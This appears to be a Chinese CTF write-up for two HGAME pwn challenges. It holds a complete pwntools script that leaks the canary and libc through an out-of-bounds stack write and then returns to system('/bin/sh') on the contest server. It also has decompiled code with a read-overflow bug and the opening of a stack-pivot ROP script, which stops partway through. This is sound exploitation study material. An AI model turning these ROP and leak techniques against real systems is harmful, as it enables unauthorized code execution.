一共两周,第一周说难也不难说简单也不简单。
pwn
counting petals
数组 v7 长度为 17，输入 16 时写入 v7[16+1] 会发生溢出，溢出到 v8、v9；将其改大后，程序会输出 canary 和 libc_start_main_ret 的地址。第 2 次进入时覆盖到返回地址，写上 ROP。
# Solve script for "counting petals" (HGAME), as described in the paragraph
# above. Root cause on the program side: the entry count is not validated
# against the length of the 17-element stack array v7, so a count of 16 makes
# the loop write one element past the array into the adjacent locals v8/v9.
# The fix in the vulnerable program is a bounds check on the count before the
# write loop (and a bounded loop when printing the results back).
# Runs in two stages: (1) out-of-bounds write enlarges the neighbouring
# locals so the result printout leaks the stack canary and a libc return
# address; (2) the same overflow is reused to overwrite the return address.
from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
# Local debugging variants kept by the author (breakpoint address is
# PIE-relative to the gdb default base).
#p = process('./vuln')
#gdb.attach(p, "b*0x555555555535\nc")
p = remote('node1.hgame.vidar.club', 30788)

# --- stage 1: leak ---
# 16 entries are accepted even though only indices 0..15 are safe.
p.sendlineafter(b"time?\n", b'16')
for i in range(15):
    p.sendlineafter(b" : ", b'0')
# 16th entry: lands on v8/v9 per the writeup; the large value presumably
# enlarges the count used when the results are echoed back, so the printout
# walks past the array into the canary and saved addresses — TODO confirm
# the exact local layout against the binary.
p.sendlineafter(b" : ", str((0x10<<32)+22).encode())
# Non-numeric answers end the input loop early (six extra prompts appear).
for i in range(6):
    p.sendlineafter(b" : ", b'-')
p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.recvuntil(b"Let's look at the results.\n")
# The program prints the entries as "a + b + ... =", so split on " + ".
v = p.recvuntil(b"=", drop=True).decode().split(' + ')
print(v)
# Index 18 holds the __libc_start_main return address (writeup); 0x29d90 is
# that return's offset in this libc build, so subtracting gives libc base.
libc.address = int(v[18]) - 0x29d90
# Index 16 holds the stack canary (writeup).
canary = int(v[16])
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
print(f"{libc.address = :x} {canary = :x}")

# --- stage 2: overwrite the return address ---
p.sendlineafter(b"time?\n", b'16')
# Same 15 padding entries and the same oversized 16th entry, followed by the
# leaked canary, a placeholder for the saved rbp (0), a lone `ret`
# (pop_rdi+1, presumably for 16-byte stack alignment — confirm), then
# pop rdi / "/bin/sh" / system.
pay = [0]*15+[(0x10<<32)+22, canary,0,pop_rdi+1,pop_rdi,next(libc.search(b'/bin/sh')), libc.sym['system']]
for i in pay:
    p.sendlineafter(b" : ", str(i).encode())
p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.sendline(b'cat flag')
p.interactive()
#flag{b945024b-f973-497c-30e4-c14722593da5}
ezstack
PIE 没开，加载地址已知。溢出正好能覆盖到返回地址。
/*
 * Decompiler output of the vulnerable function in `ezstack`.
 *
 * a1 is the descriptor handed to the program's own print() helper and to
 * read(); print() is a project function, not stdio (its signature is not
 * visible here). Returns whatever read() returns.
 *
 * BUG: read() is allowed to write up to 0x60 (96) bytes into an 80-byte
 * buffer. buf sits at [rbp-50h], so the 16 surplus bytes cover exactly the
 * saved rbp and the return address — which is what the writeup below relies
 * on. Fix: bound the read by the buffer, e.g. read(a1, buf, sizeof(buf)),
 * and keep a byte spare if the data is later treated as a C string.
 */
ssize_t __fastcall vuln(unsigned int a1)
{
    char buf[80]; // [rsp+10h] [rbp-50h] BYREF
    print(a1, &unk_402018);
    print(a1, "That's all.\n");
    print(a1, "Good luck.\n");
    return read(a1, buf, 0x60uLL); // 0x60 > sizeof(buf): stack overflow
}
先把栈迁移到 BSS，再利用 0x50 的空间写 ROP 泄露 libc，随后再读入后续的 ORW 链。
from pwn import *
context(arch='amd64', log_level='debug')
#20.04 focal libc-2.31
libc = ELF('./libc-2.31.so')
elf = ELF('./vuln')
leave_ret = 0x401426
pop_rdi = 0x0000000000401713